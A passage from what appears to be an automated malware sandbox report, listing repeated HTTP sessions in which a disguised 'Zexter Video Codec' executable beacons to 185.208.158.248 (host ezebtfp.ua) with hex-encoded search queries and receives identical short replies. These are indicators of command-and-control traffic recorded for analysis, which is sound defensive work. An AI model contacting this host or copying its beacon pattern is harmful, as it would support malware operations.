    Date: Thu, 03 Oct 2024 06:40:41 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.5 | 49753 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:42.209418058 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
    Host: ezebtfp.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:42.892733097 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 03 Oct 2024 06:40:42 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.5 | 49754 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:43.018748999 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
    Host: ezebtfp.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:43.712949991 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 03 Oct 2024 06:40:43 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Oct 3, 2024 08:40:43.826062918 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
    Host: ezebtfp.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:44.063143969 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 03 Oct 2024 06:40:43 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.5 | 49755 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:44.191057920 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
    Host: ezebtfp.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:44.974131107 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 03 Oct 2024 06:40:44 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.5 | 49756 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:45.495464087 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
  Host: ezebtfp.ua
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:46.182421923 CEST | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Thu, 03 Oct 2024 06:40:46 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20
Oct 3, 2024 08:40:46.294872999 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
  Host: ezebtfp.ua
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:46.530219078 CEST | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Thu, 03 Oct 2024 06:40:46 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.5 | 49757 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:46.659794092 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
  Host: ezebtfp.ua
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:47.354055882 CEST | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Thu, 03 Oct 2024 06:40:47 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.5 | 49758 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:47.502206087 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
  Host: ezebtfp.ua
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:48.187638044 CEST | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Thu, 03 Oct 2024 06:40:48 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.5 | 49759 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:48.361952066 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
  Host: ezebtfp.ua
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:49.043767929 CEST | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Thu, 03 Oct 2024 06:40:48 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20
Oct 3, 2024 08:40:49.153165102 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
  Host: ezebtfp.ua
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:49.395987988 CEST | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Thu, 03 Oct 2024 06:40:49 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.5 | 49760 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:49.517812014 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
  Host: ezebtfp.ua
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:50.227657080 CEST | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Thu, 03 Oct 2024 06:40:50 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.5 | 49761 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:50.346549034 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
  Host: ezebtfp.ua
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:51.027204990 CEST | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Thu, 03 Oct 2024 06:40:50 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20
Oct 3, 2024 08:40:51.137662888 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
  Host: ezebtfp.ua
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:51.380590916 CEST | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Thu, 03 Oct 2024 06:40:51 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.5 | 49764 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:51.508207083 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
  Host: ezebtfp.ua
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:52.430325031 CEST | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Thu, 03 Oct 2024 06:40:52 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20
Oct 3, 2024 08:40:52.430548906 CEST | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Thu, 03 Oct 2024 06:40:52 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.5 | 49765 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:52.558202982 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
  Host: ezebtfp.ua
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:53.253561020 CEST | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Thu, 03 Oct 2024 06:40:53 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.5 | 49766 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:53.377336979 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
  Host: ezebtfp.ua
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:54.075546980 CEST | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Thu, 03 Oct 2024 06:40:53 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.5 | 49767 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:54.189970970 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
  Host: ezebtfp.ua
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:54.886464119 CEST | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Thu, 03 Oct 2024 06:40:54 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20
Oct 3, 2024 08:40:54.998264074 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
  Host: ezebtfp.ua
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:55.242464066 CEST | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Thu, 03 Oct 2024 06:40:55 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.5 | 49768 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:55.362102985 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
    Host: ezebtfp.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:56.045413017 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 03 Oct 2024 06:40:55 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Oct 3, 2024 08:40:56.154511929 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
    Host: ezebtfp.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:56.394747972 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 03 Oct 2024 06:40:56 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.5 | 49769 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:56.517770052 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
    Host: ezebtfp.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:57.227519989 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 03 Oct 2024 06:40:57 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.5 | 49772 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:57.380521059 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
    Host: ezebtfp.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:58.064780951 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 03 Oct 2024 06:40:57 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.5 | 49773 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:58.190072060 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
    Host: ezebtfp.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:59.086555958 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 03 Oct 2024 06:40:58 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Oct 3, 2024 08:40:59.088099957 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 03 Oct 2024 06:40:58 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.5 | 49774 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:59.220988035 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
    Host: ezebtfp.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:59.934163094 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 03 Oct 2024 06:40:59 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.5 | 49775 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:41:00.084393978 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
    Host: ezebtfp.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:41:00.787364960 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 03 Oct 2024 06:41:00 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
